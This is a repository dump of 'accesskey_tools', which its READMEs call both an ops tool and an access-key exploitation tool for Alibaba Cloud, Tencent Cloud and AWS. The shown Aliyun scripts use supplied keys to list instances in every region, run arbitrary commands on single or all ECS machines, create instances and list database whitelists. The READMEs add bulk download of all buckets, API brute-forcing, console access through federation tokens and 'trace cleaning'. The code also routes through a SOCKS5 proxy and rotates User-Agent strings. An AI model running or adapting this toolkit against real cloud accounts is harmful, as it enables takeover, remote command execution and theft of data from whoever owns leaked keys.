Repository: kohlersbtuh15/accesskey_tools
Branch: main
Commit: de50141a334a
Files: 36
Total size: 86.5 KB
Directory structure:
gitextract_clmgkotm/
├── FILES/
│ ├── 1.awebp
│ ├── 2.awebp
│ ├── 3.awebp
│ ├── 4.awebp
│ ├── 5.awebp
│ ├── 6.awebp
│ └── 7.awebp
├── README.en.md
├── README.md
├── aliyun/
│ ├── README.en.md
│ ├── README.md
│ ├── aliyun_create_ecs.py
│ ├── aliyun_ecs_exec.py
│ ├── aliyun_ecs_exec_batch.py
│ ├── aliyun_getall_rds.py
│ ├── config.py
│ ├── oss_download.py
│ └── requirements.txt
├── aws/
│ ├── README.en.md
│ ├── README.md
│ ├── amazon_ssm_managed_instance_core.json
│ ├── aws_download_s3.py
│ ├── aws_ec2_exec.py
│ ├── aws_select_iam.py
│ ├── aws_select_rds.py
│ ├── aws_select_route53.py
│ ├── aws_url_console.py
│ ├── config.py
│ ├── ec2_role_trust_policy.json
│ └── requirements.txt
└── tencentcloud/
├── README.en.md
├── README.md
├── config.py
├── requirements.txt
├── tencentcloud_cvm_exec.py
└── tencentcloud_download_cos.py
================================================
FILE CONTENTS
================================================
================================================
FILE: README.en.md
================================================
English | [中文](./README.md)
# accesskey_tools
The accesskey automated operation and maintenance tools and accesskey utilization tools of various cloud vendors such as alicloud/tencentcloud/huaweicloud/aws, including but not limited to various functions such as creating ecs, ecs query and command execution, oss query and batch download, will continue to be added in the future. Various functions.
## Function description
* IAM queries the current user permissions of aksk. Enter "enum" to perform interface service blasting.
* EC2 Query the detailed information of EC2 machine instances in various AWS regions. The specified instance can execute system commands. Trace cleaning: delete the created policy and bound IAM.
* RDS queries all rds details of AWS, as well as IP whitelist restriction information.
* S3 queries all s3 bucket bucket information, and you can specify the bucket and bucket folder.
* ROUTE53 queries the domain name DNS records created by AWS in all regions.
* URL_CONSOLE Use aksk to apply for a federation token and obtain console permissions (valid time: 15 minutes)
## Get started quickly
### Query and execute commands on the ec2 machine instance.
After executing the script, the ec2 machine instance status in each region will be automatically retrieved and json will be returned.
You can choose whether to delete the created roles and policies.
You can also delete the iam bound to the ec2 machine.
Enter the machine instance to execute the command. The type of command to be executed will be automatically selected based on the data in json:
```
"Linux": "AWS-RunShellScript",
"windows": "AWS-RunPowerShellScript"
```
### RDS queries all rds details of AWS,
as well as IP whitelist restriction information.
### S3 queries all s3 bucket bucket information
all mode downloads all files in all buckets.
You can specify the bucket and bucket folder.
### ROUTE53
Query the domain name DNS records created by AWS in all regions.
### URL_CONSOLE
Use aksk to apply for a federation token and obtain console permissions (valid time: 15 minutes)
For information on how to use the tool, please refer to the article:
[accesskey_tools: An Alibaba Cloud operations and maintenance tool for automation](https://kohlersbtuh15s-organization.gitbook.io/alibabacloud_accesskey_tools/)
[AWS AccessKey Tools: Powerful Security Assessment and Penetration Testing Tools](https://kohlersbtuh15s-organization.gitbook.io/aws_accesskey_tools/)
# Disclaimer
This tool is only used by operation and maintenance personnel to manage cloud business and security testing, and may not be used for any illegal attacks.
# TODO
* huaweicloud accesskey related functions
* qiniuyun accesskey related functions
================================================
FILE: README.md
================================================
[English](./README.en.md) | 中文
# accesskey_tools
阿里云aliyun/腾讯云tencentcloud/华为云huaweicloud/aws等各种云厂商的accesskey自动化运维工具,accesskey利用工具,包括但不限于创建ecs、ecs查询和命令执行、oss查询和批量下载等各种功能,后续会持续添加各种功能
# 工具下载
```
git clone https://github.com/kohlersbtuh15/accesskey_tools.git
```
# 使用说明
```
cd aws/aliyun/tencentcloud #进入相应的云服务平台
pip3 install -r requirements.txt
vi config.py #填写AccessKeyID和AccessKeySecret,按需填写SOCKS5_PROXY_HOST和SOCKS5_PROXY_PORT
python3 aws_ec2_exec.py
```
# 功能描述
* IAM 查询当前aksk的用户权限,输入"enum"可进行接口服务爆破。
* EC2 查询aws各地区的ec2机器实例的详情信息,指定实例可执行系统命令,痕迹清理:删除创建的策略和绑定的iam。
* RDS 查询aws所有rds详情信息,以及IP白名单限制信息。
* S3 查询所有s3 bucket存储桶信息,可指定bucket以及bucket的文件夹。
* ROUTE53 查询aws所有地区创建的域名DNS记录。
* URL_CONSOLE 使用aksk申请联邦令牌,获取控制台权限(有效时间:15分钟)
# 快速上手
### 1、ec2机器实例查询并执行命令
执行脚本后会自动检索各个地区的ec2机器实例情况以及agent情况,并返回json。
输入机器实例,进行执行命令。会根据json中的数据自动选择执行命令的类型:
```
"Linux": "AWS-RunShellScript",
"windows": "AWS-RunPowerShellScript",
```
### 2、RDS查询
aws所有rds详情信息、快照详情、IP白名单限制信息。
### 3、S3 查询所有s3 bucket存储桶信息
all模式下载所有桶子中的所有文件。
可指定bucket以及bucket的文件夹。
### 4、ROUTE53
查询aws所有地区创建的域名DNS记录。
### 5、URL_CONSOLE
使用aksk申请联邦令牌,获取控制台权限(有效时间:15分钟)
关于工具使用方式可参考文章:
[accesskey_tools:一款针对云环境的多功能利用脚本工具](https://blog.csdn.net/saygoodbyeyo/article/details/132347160)
[accesskey_tools: 阿里云运维工具:自动化运维的利器](https://www.freebuf.com/sectool/377068.html)
[accesskey_tools: aws accesskey利用工具](https://www.freebuf.com/sectool/377988.html)
# 免责声明
该工具仅用于运维人员管理云上业务及安全测试,不得用于任何非法攻击。
# TODO
* 华为云huaweicloud accesskey相关功能
* 七牛云qiniuyun accesskey相关功能
================================================
FILE: aliyun/README.en.md
================================================
English | [中文](./README.md)
## Error handling
If you encounter pip installation errors, it is recommended to update pip and then install the dependencies.
`pip install --upgrade pip`
## File description
#### aliyun_ecs_exec.py
Used to query the detailed information of ecs instances in various regions of Alibaba Cloud and specify the ecs instance to execute commands.
#### aliyun_ecs_exec_batch.py
Used to query the detailed information of ecs instances in various regions of Alibaba Cloud and execute ecs instance commands in batches
#### aliyun_create_ecs.py
Used to create Alibaba Cloud instances in batches
#### aliyun_getall_rds.py
Used to query all Alibaba Cloud RDS details and their IP restrictions
#### oss_download.py
Used to download all files in oss, and can also specify a bucket for download.
#### config.py
Configuration information required to run the code, including accesskey, accesskeysecret, proxy IP and port and other parameters
## Instructions for use
To install the required dependencies before use, run `pip install -r requirements.txt`, fill in the corresponding values in config.py, run the corresponding py script directly, and enter the corresponding values as prompted.
## proxy
The socks proxy is provided in the code. When you need to use it, fill in the ip and port values in config.py, and then remove the corresponding comment part in the code.
================================================
FILE: aliyun/README.md
================================================
[English](./README.en.md) | 中文
## 报错处理
如果在安装依赖时报错,请先更新pip版本再重新安装。
`pip install --upgrade pip`
## 文件说明
#### aliyun_ecs_exec.py
用于查询阿里云各地区ecs实例的详细信息,并可指定ecs实例执行命令
#### aliyun_ecs_exec_batch.py
用于查询阿里云各地区ecs实例的详细信息,并可批量执行ecs实例命令
#### aliyun_create_ecs.py
用于批量创建阿里云实例
#### aliyun_getall_rds.py
用于查询阿里云所有rds详细信息和其ip限制
#### oss_download.py
用于下载所有oss中的文件,也可指定bucket下载
#### config.py
代码运行所需的配置信息,包括accesskey、accesskeysecret、代理的ip和端口等参数
## 使用说明
使用前安装所需的依赖,运行pip install -r requirements.txt即可,填好config.py中对应的值,直接运行对应的py脚本,按照提示输入对应的值
## 代理
代码中提供了socks代理,需要使用时在config.py中填好ip和port值,然后去掉代码中对应的注释部分即可
================================================
FILE: aliyun/aliyun_create_ecs.py
================================================
# -*- coding: utf-8 -*-
from typing import List
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_ecs20140526.client import Client as EcsClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_vpc20160428 import models as vpc_models
from alibabacloud_vpc20160428.client import Client as VpcClient
from alibabacloud_ecs20140526 import models as ecs_models
from alibabacloud_darabonba_array.client import Client as ArrayClient
import config
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
class Create_instances:
def __init__(self):
pass
@staticmethod
def main(
access_key_id: str, access_key_secret: str, region_id: str, instance_type: str, image_id: str,
security_group_id: str,
zone_id: str, v_switch_id: str, password: str, autorelease_time: str,
security_enhancement_strategy: str, dry_run: bool
):
access_key_id = access_key_id
access_key_secret = access_key_secret
period = None
period_unit = None
auto_renew_period = None
auto_renew = None
available_info = {}
if not region_id:
for region in config.RegionIds:
print(f'地区代码:{region} 对应地区: {config.RegionIds[region]}')
region_id = input("请输入要创建的实例地区代码,如cn-hangzhou: ").replace(' ', '')
config_client = Create_instances.create_client(access_key_id, access_key_secret, region_id)
while True:
if not zone_id:
available_info = Create_instances.describe_zones(config_client, region_id)
zone_id = input("请输入可用区ID: ").replace(' ', '')
vpc_id = None
if not v_switch_id or not vpc_id:
vpcs = Create_instances.describe_vswitches(region_id, zone_id)
if not vpcs:
print(f'[error] 所选可用区{zone_id}无可用虚拟交换机,请重新选择可用区或先创建虚拟交换机。')
zone_id = None
continue
v_switch_id = input("请输入虚拟交换机ID: ").replace(' ', '')
if v_switch_id not in vpcs.keys():
print(f'请输入正确的虚拟交换机ID: ')
continue
else:
vpc_id = vpcs[v_switch_id]
break
if not instance_type:
while True:
cpucore_num = int(input("请输入要创建实例的CPU核数:").replace(' ', ''))
memory_size = int(input("请输入要创建实例的内存大小(GB):").replace(' ', ''))
has_instancetypes = Create_instances.describe_instancetype(config_client, cpucore_num, memory_size,
available_info[zone_id]['instance_types'])
if not has_instancetypes:
print(f'[error] 可用区{zone_id}无符合要求的实例规格,请重新选择')
else:
instance_type = input("请输入选择的实例类型ID: ").replace(' ', '')
break
if not image_id:
Create_instances.describe_images(config_client, region_id)
image_id = input("请输入镜像ID:").replace(' ', '')
if not security_group_id:
Create_instances.describe_security_group(config_client, region_id, vpc_id)
security_group_id = input("请输入安全组ID:").replace(' ', '')
if not password:
password = input(
"请输入实例密码,长度为8至30个字符,必须同时包含大小写英文字母、数字和特殊符号中的三类字符,Windows实例不能以正斜线(/)为密码首字符: ").replace(
' ', '')
print(f'以设定实例密码为: {password}')
internet_charge_type = 'PayByBandwidth' if input(
"请选择宽带付费方式, PayByBandwidth:按固定带宽计费;PayByTraffic:按使用流量计费。默认为按量计费: ") == 'PayByBandwidth' else 'PayByTraffic'
internet_maxband_widthout = int(input("请输入公网出宽带最大值,范围为0 - 100Mbit / s: ").replace(' ', ''))
internet_maxband_widthin = int(
input("请输入公网如宽带最大值,范围为0 - internet_maxband_widthout Mbit / s: ").replace(' ', ''))
systemdisk_size = int(input("请输入云盘大小,范围为 20-500 : ").replace(' ', ''))
while True:
systemdisk_category = input(
"请输入云盘类型:cloud_efficiency:高效云盘,cloud_ssd:SSD云盘,cloud_essd:ESSD云盘,cloud:普通云盘,cloud_auto:ESSD AutoPL云盘: ").replace(
' ', '')
if systemdisk_category not in available_info[zone_id]['diskcategory']:
print(f'所选云盘类型{systemdisk_category}不支持,请重新选择: ')
else:
break
amount = int(input("请输入要开启的实例数量 1-100 : ").replace(' ', ''))
instance_charge_type = 'PrePaid' if input(
"请输入实例付费方式,PrePaid:包年包月。PostPaid:按量付费, 默认为按量付费: ").replace(' ',
'') == 'PrePaid' else 'PostPaid'
auto_pay = True if input(
"创建实例时是否自动付费,设置True时若账户余额不足,会生成作废订单,只能重新创建;设置为False时,会在控制台生成待支付订单,可自行支付,默认不自动付费,请输入 T 或者 F: ").replace(
' ', '') == 'T' else False
if instance_charge_type == 'PostPaid':
autorelease_time = input("请输入自动施放时间,如2018-01-01T12:05:00Z,默认不自动释放: ").replace(' ', '')
auto_pay = True
if instance_charge_type == 'PrePaid':
period_unit = input("请输入包年包月计费时长单位,取值范围:Week和Month: ").replace(' ', '')
period = int(input("请输入购买资源时长,如 1 : ").replace(' ', ''))
auto_renew = True if input("是否自动续费,如需自动续费请输入Y: ").replace(' ', '') == 'Y' else False
if auto_renew:
auto_renew_period = int(input("请输入自动续费时长,单位为包年包月计费单位,如 1 : ").replace(' ', ''))
# 创建并与运行实例
print(f'[info] --------开始创建实例-----------')
responces = config_client.run_instances(ecs_models.RunInstancesRequest(
region_id=region_id,
instance_type=instance_type,
image_id=image_id,
security_group_id=security_group_id,
zone_id=zone_id,
v_switch_id=v_switch_id,
amount=amount,
password=password,
internet_max_bandwidth_in=internet_maxband_widthin,
internet_max_bandwidth_out=internet_maxband_widthout,
internet_charge_type=internet_charge_type,
auto_release_time=autorelease_time,
security_enhancement_strategy=security_enhancement_strategy,
period=period,
period_unit=period_unit,
auto_renew_period=auto_renew_period,
instance_charge_type=instance_charge_type,
auto_renew=auto_renew,
auto_pay=auto_pay,
dry_run=dry_run,
system_disk=ecs_models.RunInstancesRequestSystemDisk(
size=systemdisk_size,
category=systemdisk_category
)
))
print(
f'[info]-----------创建实例成功,实例ID:{UtilClient.to_jsonstring(responces.body.instance_id_sets.instance_id_set)}--------------')
@staticmethod
def describe_instancetype(
client: EcsClient,
cupcore_num: int,
memory_size: int,
available_types: List[str]
):
describe_instance_types_request = ecs_models.DescribeInstanceTypesRequest(
minimum_cpu_core_count=cupcore_num,
maximum_cpu_core_count=cupcore_num,
minimum_memory_size=memory_size,
maximum_memory_size=memory_size
)
flag = False
try:
response = client.describe_instance_types(describe_instance_types_request)
for instance_type in response.body.instance_types.instance_type:
if instance_type.instance_type_id in available_types:
print(
f'实例类型ID: {instance_type.instance_type_id} 实例规格分类:{instance_type.instance_category} 系统架构:{instance_type.cpu_architecture} 处理器型号:{instance_type.physical_processor_model}')
flag = True
return flag
except Exception as error:
# 如有需要,请打印 error
print(error)
@staticmethod
def describe_images(
client: EcsClient,
region_id: str
):
os_type = 'windows' if input('请输入镜像操作系统类型(linux或windows),默认为linux:') == 'windows' else 'linux'
page = 1
while True:
describe_images_request = ecs_models.DescribeImagesRequest(
region_id=region_id,
status='Available',
ostype=os_type,
page_size=50,
page_number=page
)
response = client.describe_images(describe_images_request)
for image in response.body.images.image:
print(f'镜像ID:{image.image_id}{" " * (60 - len(image.image_id))}镜像名称:{image.osname}')
if page * 50 > response.body.total_count:
break
page = page + 1
@staticmethod
def describe_vswitches(
region_id: str,
zone_id: str
):
vswitches = {}
describe_vswitch_request = vpc_models.DescribeVSwitchesRequest(
region_id=region_id,
zone_id=zone_id
)
response = VpcClient(open_api_models.Config(config.AccessKeyID, config.AccessKeySecret,
endpoint=f'vpc.aliyuncs.com')).describe_vswitches(
describe_vswitch_request)
for vswitch in response.body.v_switches.v_switch:
vswitches[vswitch.v_switch_id] = vswitch.vpc_id
print(
f'虚拟交换机ID: {vswitch.v_switch_id} 虚拟网络ID: {vswitch.vpc_id} 虚拟交换机名称: {vswitch.v_switch_name} 虚拟网络段: {vswitch.cidr_block}')
return vswitches
@staticmethod
def describe_security_group(
client: EcsClient,
region_id: str,
vpc_id: str
):
describe_security_request = ecs_models.DescribeSecurityGroupsRequest(
region_id=region_id,
vpc_id=vpc_id
)
response = client.describe_security_groups(describe_security_request)
for security_group in response.body.security_groups.security_group:
print(f'安全组ID: {security_group.security_group_id} 安全组名称: {security_group.security_group_name}')
@staticmethod
def describe_zones(
client: EcsClient,
region_id: str
):
describe_zones_request = ecs_models.DescribeZonesRequest(
region_id=region_id
)
response = client.describe_zones(describe_zones_request)
available = {}
for zone in response.body.zones.zone:
print(f'zone_id: {zone.zone_id}')
available[zone.zone_id] = {}
available[zone.zone_id]['instance_types'] = zone.available_instance_types.instance_types
available[zone.zone_id]['diskcategory'] = zone.available_disk_categories.disk_categories
return available
@staticmethod
def create_client(
access_key_id: str,
access_key_secret: str,
region_id: str,
) -> EcsClient:
client_config = open_api_models.Config()
client_config.access_key_id = access_key_id
client_config.access_key_secret = access_key_secret
client_config.region_id = region_id
return EcsClient(client_config)
if __name__ == '__main__':
access_key_id = config.AccessKeyID
access_key_secret = config.AccessKeySecret
# 地区
region_id = ''
# 实例规格
instance_type = ''
# 镜像id
image_id = ''
# 安全组id
security_group_id = ''
# 可用区id
zone_id = ''
# 交换机id
v_switch_id = ''
# 实例密码,长度为8至30个字符,必须同时包含大小写英文字母、数字和特殊符号中的三类字符,Windows实例不能以正斜线(/)为密码首字符。
password = ''
# 公网出宽带最大值,范围为0-100Mbit/s
internet_maxband_widthout = 100
# 公网入带宽最大值。最小为10Mbit/s, 最大为internet_maxband_widthout值
internet_maxband_widthin = internet_maxband_widthout
# 按量付费自动施放时间,按照ISO8601标准表示,使用UTC+0时间。格式为:yyyy-MM-ddTHH:mm:ssZ。如2018-01-01T12:05:00Z
autorelease_time = ''
# 是否开启安全加固
security_enhancement_strategy = 'Active'
# 预检请求
# true:发送检查请求,不会创建实例。检查项包括是否填写了必需参数、请求格式、业务限制和ECS库存。如果检查不通过,则返回对应错误。如果检查通过,则返回DryRunOperation错误。
# false:发送正常请求,通过检查后直接创建实例。
dry_run = False
if not access_key_id or not access_key_secret:
print("请在config.py中设置accesskeyID和accesskeysecret")
exit()
try:
Create_instances.main(access_key_id=config.AccessKeyID, access_key_secret=config.AccessKeySecret,
region_id=region_id, instance_type=instance_type, image_id=image_id,
security_group_id=security_group_id, zone_id=zone_id, v_switch_id=v_switch_id,
password=password, autorelease_time=autorelease_time,
security_enhancement_strategy=security_enhancement_strategy, dry_run=dry_run
)
except Exception as e:
print('[error] ---------实例创建失败---------')
print(e)
================================================
FILE: aliyun/aliyun_ecs_exec.py
================================================
from aliyunsdkcore.client import AcsClient
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest
from aliyunsdkecs.request.v20140526.InvokeCommandRequest import InvokeCommandRequest
from aliyunsdkecs.request.v20140526.DescribeCloudAssistantStatusRequest import DescribeCloudAssistantStatusRequest
from aliyunsdkecs.request.v20140526.DescribeInvocationResultsRequest import DescribeInvocationResultsRequest
import json, base64, random, time, config
# import socket, socks
#
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def DescribeCloudAssistantStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId):
client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)
request = DescribeCloudAssistantStatusRequest()
request.set_accept_format('json')
request.set_InstanceIds([InstanceId])
response = client.do_action_with_exception(request)
return json.loads(response)
def CreateCommand(AccessKeyID, AccessKeySecret, com_type, command, ZoneId, InstanceId):
client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)
request = CreateCommandRequest()
request.set_accept_format('json')
name = ''.join(random.sample(
['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g', 'f', 'e',
'd', 'c', 'b', 'a'], 5))
try:
CloudAssistantStatus = DescribeCloudAssistantStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId)
Status = CloudAssistantStatus['InstanceCloudAssistantStatusSet']['InstanceCloudAssistantStatus'][0][
'CloudAssistantStatus']
if Status == 'false':
print('no InstanceCloudAssistant,can not execute command!')
return
request.set_Name(name)
request.set_Type(com_type)
request.set_connect_timeout(60)
command = base64.b64encode(command.encode()).decode()
request.set_CommandContent(command)
response = client.do_action_with_exception(request)
return json.loads(response)['CommandId']
except Exception as e:
print(e)
print('command create faild!')
def InvokeCommand(AccessKeyID, AccessKeySecret, ZoneId, InstanceId, CommandId):
client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)
try:
request = InvokeCommandRequest()
request.set_accept_format('json')
request.set_CommandId(CommandId)
request.set_InstanceIds([InstanceId])
response = client.do_action_with_exception(request)
if json.loads(response)['InvokeId'] == '':
print('execute command error!')
else:
return json.loads(response)['InvokeId']
except Exception as e:
print(e)
print('execute command error!')
def DescribeInvocationResults(AccessKeyID, AccessKeySecret, ZoneId, InvokeID):
client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)
request = DescribeInvocationResultsRequest()
request.set_accept_format('json')
request.set_InvokeId(InvokeID)
response = client.do_action_with_exception(request)
return json.loads(response)
def DescribeInstances(AccessKeyID, AccessKeySecret):
ecs_info = {}
for RegionId in config.RegionIds:
print('searching -------' + RegionId)
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
try:
request = DescribeInstancesRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
response = client.do_action_with_exception(request)
except Exception as e:
print(e)
print('please check AccessKey and AccessKeySecret')
continue
for each in json.loads(response)['Instances']['Instance']:
InstanceId = each["InstanceId"]
ecs_info[InstanceId] = each
return ecs_info
def commad_check_input(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, ecs_info):
if cmd == '':
cmd = input("please input cmd:")
if com_type == None:
com_type = input('please input command type:'
'0:RunShellScript'
'1:RunBatScript'
'2:RunPowerShellScript'
':')
if com_type == '0':
com_type = 'RunShellScript'
elif com_type == '1':
com_type = 'RunBatScript'
elif com_type == '2':
com_type = 'RunPowerShellScript'
Status = ecs_info[InstanceId]['Status']
ZoneId = ecs_info[InstanceId]['RegionId']
if Status == 'Stopped':
print('instance is stopped!')
return
if InstanceId not in ecs_info.keys():
print('instance is not exist!')
return
command_ID = CreateCommand(AccessKeyID, AccessKeySecret, com_type, cmd, ZoneId, InstanceId)
InvokeID = InvokeCommand(AccessKeyID, AccessKeySecret, ZoneId, InstanceId, command_ID)
time.sleep(1)
Result = DescribeInvocationResults(AccessKeyID, AccessKeySecret, ZoneId, InvokeID)
try:
output = Result['Invocation']['InvocationResults']['InvocationResult'][0]['Output']
print("command result:" + base64.b64decode(output).decode())
except:
print("command result error!")
pass
return 0
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("please input AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("please input AccessKeySecret:")
ecs_info = DescribeInstances(AccessKeyID, AccessKeySecret)
if not ecs_info:
print("no result")
exit(0)
for each in ecs_info:
print(each)
print(ecs_info[each])
InstanceId = input("please input instanceId:")
com_type = None
while True:
if com_type is None:
com_type = input('please input command type:'
'0:RunShellScript'
'1:RunBatScript'
'2:RunPowerShellScript'
':')
cmd = ''
commad_check_input(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, ecs_info)
flag = input("input q quit,other key continue:")
if flag == 'q':
break
is_continue = input("input yes to select other Instance:")
if is_continue == 'yes':
com_type = None
InstanceId = input("please input instanceId:")
================================================
FILE: aliyun/aliyun_ecs_exec_batch.py
================================================
from aliyunsdkcore.client import AcsClient
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.RunCommandRequest import RunCommandRequest
from aliyunsdkecs.request.v20140526.DescribeInvocationsRequest import DescribeInvocationsRequest
import json, base64, random, time, config, datetime
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
headers = {"User-Agent": random.choice(config.user_agents)
}
def DescribeInstances(AccessKeyID, AccessKeySecret):
ecs_info = {}
for RegionId in config.RegionIds:
print('检索中-------' + RegionId)
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
try:
request = DescribeInstancesRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
request.set_headers(headers)
response = client.do_action_with_exception(request)
except Exception as e:
print(e)
print('请检查输入Key与Secret值,或重新执行')
continue
for each in json.loads(response)['Instances']['Instance']:
InstanceId = each["InstanceId"]
ecs_info[InstanceId] = each
return ecs_info
def DescribeInvocation(AccessKeyID, AccessKeySecret, RegionId, InvokeId):
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
request = DescribeInvocationsRequest()
request.set_headers(headers)
request.set_InvokeId(InvokeId)
request.set_IncludeOutput(True)
request.set_PageSize(20)
request.set_PageNumber(1)
response = client.do_action_with_exception(request)
return json.loads(response)
def RunCommand(AccessKeyID, AccessKeySecret, RegionId, command_type, commandContent, InstanceIds):
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
request = RunCommandRequest()
request.set_InstanceIds(InstanceIds)
request.set_CommandContent(commandContent)
request.set_Type(command_type)
# 命令执行模式,默认立即执行命令,可填以下选项
# Once: 立即执行命令
# Period: 定时执行命令,当该参数取值为Period时,必须同时指定Frequency参数
# NextRebootOnly: 当实例下一次启动时,自动执行命令
# EveryReboot: 实例每一次启动都将自动执行命令
# request.set_RepeatMode('Once')
# 定时执行命令的执行时间
# 固定时间间隔执行: rate(<执行间隔数值><执行间隔单位>),如5分钟执行一次,设置为rate(5m)
# 仅在指定时间执行一次: at(yyyy-MM-dd HH:mm:ss <时区>),如指定在中国/上海时间2022年06月06日13时15分30秒执行一次,设置为at(2022-06-06 13:15:30 GMT-7:00)
# 定时任务表达式: <Cron表达式> <时区>,如在中国/上海时间,2022年每天上午10:15执行一次命令,格式为0 15 10 ? * * 2022 Asia/Shanghai
# request.set_Frequency("rate(5m)")
# 在实例中执行命令的用户名称
# request.set_Username("root")
request.set_ContentEncoding('base64')
request.set_Name("cmd_" + str(datetime.date.today()) + "_" + datetime.datetime.now().strftime("%H-%M-%S"))
request.set_headers(headers)
response = client.do_action_with_exception(request)
return json.loads(response)
def commad_check_input(AccessKeyID, AccessKeySecret, InstanceIds, cmd, com_type, ecs_info):
if cmd == '':
cmd = input("please input cmd:")
cmd = base64.b64encode(cmd.encode('utf-8'))
com_types = {'0': 'RunShellScript', '1': 'RunBatScript', '2': 'RunPowerShellScript'}
instances = {}
for each in InstanceIds:
if each not in ecs_info.keys():
print(each + '实例不存在,请检查实例ID')
continue
Status = ecs_info[each]['Status']
ZoneId = ecs_info[each]['RegionId']
if Status == 'Stopped':
print(each + '实例未运行,请选择运行状态实例执行命令')
continue
if ZoneId not in instances.keys():
instances[ZoneId] = [each]
else:
instances[ZoneId].append(each)
for ZoneId in instances.keys():
result = RunCommand(AccessKeyID, AccessKeySecret, ZoneId, com_types[com_type], cmd, instances[ZoneId])
time.sleep(2)
run_result = DescribeInvocation(AccessKeyID, AccessKeySecret, ZoneId, result["InvokeId"])
for InvokeInstance in run_result['Invocations']['Invocation'][0]['InvokeInstances']['InvokeInstance']:
print(InvokeInstance['InstanceId'] + '执行结果:' + base64.b64decode(InvokeInstance['Output']).decode())
def main():
ecs_info = DescribeInstances(config.AccessKeyID, config.AccessKeySecret)
if not ecs_info:
print("no result")
exit(0)
for each in ecs_info:
print(each)
print(ecs_info[each])
InstanceIds = None
while True:
if InstanceIds is None:
InstanceIds = input("请输入需要批量执行的instanceId,以逗号分隔,若要对所有机器执行命令,则输入all:")
if InstanceIds == 'all':
InstanceIds = list(ecs_info.keys())
else:
try:
InstanceIds = InstanceIds.replace(',', ',').replace(' ', '').split(',')
except Exception as e:
print(e)
print("重新输入instanceId")
continue
com_type = input('请输入执行命令类型:'
'0:RunShellScript'
'1:RunBatScript'
'2:RunPowerShellScript'
':')
if com_type not in ['0', '1', '2']:
continue
cmd = ''
commad_check_input(config.AccessKeyID, config.AccessKeySecret, InstanceIds, cmd, com_type, ecs_info)
flag = input("输入q退出,其他字符继续:")
if flag == 'q':
break
is_continue = input("需要重新输入InstanceId请输入yes:")
if is_continue == 'yes':
InstanceIds = None
if __name__ == '__main__':
main()
================================================
FILE: aliyun/aliyun_getall_rds.py
================================================
from aliyunsdkcore.client import AcsClient
from aliyunsdkrds.request.v20140815.DescribeDBInstancesRequest import DescribeDBInstancesRequest
from aliyunsdkrds.request.v20140815.DescribeDBInstanceIPArrayListRequest import DescribeDBInstanceIPArrayListRequest
import json, config
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def DescribeDB(AccessKeyID, AccessKeySecret, RegionIds):
rds_list = {}
for RegionId in RegionIds:
print('检索中-------' + RegionId)
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
try:
request = DescribeDBInstancesRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
response = client.do_action_with_exception(request)
except Exception as e:
print(e)
print('请检查输入Key与Secret值,或重新执行')
continue
data = json.loads(response)
for each in data['Items']['DBInstance']:
securitygroup = DescribeDBSecurityGroup(AccessKeyID, AccessKeySecret, each["DBInstanceId"],
each["RegionId"])
each["SecurityGroup"] = securitygroup
rds_list[each["DBInstanceId"]] = each
return rds_list
# 获取rds列表和白名单ip
def DescribeDBSecurityGroup(AccessKeyID, AccessKeySecret, DBInstanceId, RegionId):
client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
try:
request = DescribeDBInstanceIPArrayListRequest()
request.set_DBInstanceId(DBInstanceId)
request.set_accept_format('json')
response = client.do_action_with_exception(request)
return json.loads(response)
except Exception as e:
print(e)
print('请检查输入Key与Secret值,或重新执行')
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("please input AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("please input AccessKeySecret:")
result = DescribeDB(AccessKeyID, AccessKeySecret, config.RegionIds)
print(result)
================================================
FILE: aliyun/config.py
================================================
AccessKeyID = ""
AccessKeySecret = ""
SOCKS5_PROXY_HOST = ""
SOCKS5_PROXY_PORT = 1080
RegionIds = {"cn-hangzhou": "华东1(杭州)", "cn-shanghai": "华东2(上海)", "cn-nanjing": "华东5(南京)",
"cn-qingdao": "华北1(青岛)",
"cn-beijing": "华北2(北京)", "cn-north-2-gov-1": "华北 2 阿里政务云1", "cn-zhangjiakou": "华北3(张家口)",
